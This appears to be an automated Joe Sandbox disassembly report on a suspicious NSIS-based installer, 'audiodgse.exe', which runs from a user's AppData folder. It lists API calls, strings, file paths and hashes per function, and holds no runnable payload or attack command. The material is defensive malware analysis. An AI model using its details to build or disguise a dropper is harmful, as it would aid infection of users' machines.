SendMessageA.USER32 ref: 00403EB8
lstrlenA.KERNEL32(Trochidae Setup: Installing,?,Trochidae Setup: Installing,00000000), ref: 00403EE2
SetWindowTextA.USER32(?,Trochidae Setup: Installing), ref: 00403EF1
ShowWindow.USER32(?,0000000A), ref: 00404025

Strings

Trochidae Setup: Installing, xrefs: 00403ED2, 00403ED8, 00403EEF

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Trochidae Setup: Installing
API String ID: 3282139019-4121273588
Opcode ID: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
Instruction ID: ba3e3afbb1df49eb3663f2526bbc67ab17a8ece20d2805bf2467eb782e73bce3
Opcode Fuzzy Hash: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
Instruction Fuzzy Hash: FEC1AEB2604205BBDB206F61ED49D2B7A6CFB85706F40443EF641B11F1C779A942EB2E

Uniqueness

Uniqueness Score: -1.00%

Function 004037F7 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?,?,?,004032A8,0000000A), ref: 0040639F

lstrcatA.KERNEL32(1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\audiodgse.exe" ,00000000), ref: 00403872
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,75712754), ref: 004038E7
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000), ref: 004038FA
GetFileAttributesA.KERNEL32(Call), ref: 00403905
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E

Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45

RegisterClassA.USER32(00422EA0), ref: 0040398B
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039A3
CreateWindowExA.USER32 ref: 004039D8
ShowWindow.USER32(00000005,00000000), ref: 00403A0E
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 00403A3A
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 00403A47
RegisterClassA.USER32(00422EA0), ref: 00403A50
DialogBoxParamA.USER32 ref: 00403A6F

Strings

1033, xrefs: 00403817, 0040386D
Control Panel\Desktop\ResourceLocale, xrefs: 0040382B
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC
_Nb, xrefs: 0040396A, 004039D2
.DEFAULT\Control Panel\International, xrefs: 0040385D
RichEdit20A, xrefs: 00403A32, 00403A38
"C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 004037FB
RichEd32, xrefs: 00403A22
RichEdit, xrefs: 00403A41
.exe, xrefs: 004038F4
Call, xrefs: 004038B5, 004038BD, 004038CA, 00403914, 0040391A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens, xrefs: 00403881, 00403889, 00403921, 00403927, 00403937
Trochidae Setup: Installing, xrefs: 00403823, 00403829, 0040384E, 00403857, 0040386C
RichEd20, xrefs: 00403A14

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Trochidae Setup: Installing$_Nb
API String ID: 1975747703-612763135
Opcode ID: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
Instruction ID: cc9ff768997195dfc6b08b7ed0d0e3ca7810037f4103f2fdd35eeb1d807c43ce
Opcode Fuzzy Hash: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
Instruction Fuzzy Hash: 1961C4B07442007EE620AF659D45F2B3AACEB4475AB40447EF941B22E2D7BC9D02DA2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DC4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402DD5
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\audiodgse.exe,00000400), ref: 00402DF1

Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00405B77
Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\audiodgse.exe,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00402E3D
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73

Strings

C:\Users\user\AppData\Roaming, xrefs: 00402E1F, 00402E24, 00402E2A
"C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 00402DC4
Inst, xrefs: 00402EA9
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
C:\Users\user\AppData\Roaming\audiodgse.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
Null, xrefs: 00402EBB
soft, xrefs: 00402EB2
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
Error launching installer, xrefs: 00402E14

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\audiodgse.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1888111785
Opcode ID: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
Instruction ID: 90621c4e807be281ea96420bab05d42ad29c2ea1f6fd119d4e9c070f99f8684f
Opcode Fuzzy Hash: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
Instruction Fuzzy Hash: 1A51F771A00216ABDF209F61DE89B9E7BB8EB54355F50403BF900B72C1C6BC9E4197AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405FFC Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406127
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000), ref: 0040613A
SHGetSpecialFolderLocation.SHELL32(00405139,00000000,?), ref: 00406176
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406184
CoTaskMemFree.OLE32(00000000), ref: 00406190
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061B4
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,00000000,004168C0,00000000), ref: 00406206

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll, xrefs: 00406021
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004061AE
Call, xrefs: 00406026, 004060F3, 004060F4, 004060F5, 00406111, 00406126, 00406139, 00406155, 00406180, 004061B3, 004061B9, 004061D1, 004061E4, 004061FF, 00406205, 0040620D, 00406237
Software\Microsoft\Windows\CurrentVersion, xrefs: 004060F6
jl-, xrefs: 00406009

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$jl-
API String ID: 717251189-2131593371
Opcode ID: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
Instruction ID: f6f0e3a74e6b455581cb0d86726a6c3d239f08f65b325d122068a3aaf356d786
Opcode Fuzzy Hash: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
Instruction Fuzzy Hash: F4610571A00115ABEF20AF64DC84B7A3BA4DB55314F12417FEA03BA2D2C23C4962DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7

Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll), ref: 0040516F
Part of subcall function 00405101: SendMessageA.USER32 ref: 00405195
Part of subcall function 00405101: SendMessageA.USER32 ref: 004051AF
Part of subcall function 00405101: SendMessageA.USER32 ref: 004051BD

Strings

C:\Users\user\AppData\Local\Temp\nsfF9C.tmp, xrefs: 004017A3, 00401812, 00401830
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp$C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$Call
API String ID: 1941528284-1874122519
Opcode ID: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
Instruction ID: a8f8d2e71aafd7953ecb4fd9af401e61999b8e286ce35665580707d8cc6a98aa
Opcode Fuzzy Hash: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
Instruction Fuzzy Hash: BC41D371A0451ABACB107FA5DC45D9F3AB9EF05329B20823BF411F10E1C63C8A419B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405101 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll), ref: 0040516F
SendMessageA.USER32 ref: 00405195
SendMessageA.USER32 ref: 004051AF
SendMessageA.USER32 ref: 004051BD

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll, xrefs: 00405121, 00405133, 00405139, 0040515C, 00405168

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll
API String ID: 2531174081-1622199015
Opcode ID: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
Instruction ID: da75402713979d4bf34db42cde910fb2485d85a1008762fbb7bcbbad6d42931f
Opcode Fuzzy Hash: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
Instruction Fuzzy Hash: BB219A71E00108BADF119FA4CD84ADFBFB9EF05354F04807AF404A6291C6798E419FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004055C7 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
GetLastError.KERNEL32 ref: 0040561E
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405633
GetLastError.KERNEL32 ref: 0040563D

Strings

C:\Users\user\AppData\Roaming, xrefs: 004055C7
C:\Users\user\AppData\Local\Temp\, xrefs: 004055ED
ls@, xrefs: 004055FC
|s@, xrefs: 004055CD

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$ls@$|s@
API String ID: 3449924974-627287411
Opcode ID: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
Instruction ID: d76da5e920ef4cf84c76b5f8b6eadacb43d526ba9f765b2b55af8eda6d007f2e
Opcode Fuzzy Hash: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
Instruction Fuzzy Hash: 90010871C04219EAEF019BA1CC447EFBBB8EB14355F00853AD905B6290E779A605CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406304 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
wsprintfA.USER32 ref: 00406354
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368

Strings

UXTHEME, xrefs: 0040630D
%s%s.dll, xrefs: 0040634E
\, xrefs: 0040632C

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: 15cbb93803340843acffe9ced60e7e2f3372dd006ff9664fb566d465880257e2
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: C8F09C30900116ABDB159768DD0DFFB365CEB08309F14057AB986E11D1D574E9258B99

Uniqueness

Uniqueness Score: -1.00%

Function 00402FFB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403059
GetTickCount.KERNEL32(004128C0,00004000), ref: 004030DA
MulDiv.KERNEL32 ref: 00403107
wsprintfA.USER32 ref: 00403117

Strings

... %d%%, xrefs: 00403111

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
Instruction ID: eed10709806649b2ce9ecdbe6bed08e8f554dc741dea3641cf9b2fc180d08aa2
Opcode Fuzzy Hash: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
Instruction Fuzzy Hash: A7515E71901219ABDB10EF65D904A9F3BB8AF48756F14413BFD10BB2C0C7789E51CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405BA2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\audiodgse.exe" ,00403233,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405BB6
GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405BD0

Strings

"C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 00405BA2
C:\Users\user\AppData\Local\Temp\, xrefs: 00405BA5
nsa, xrefs: 00405BAD

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
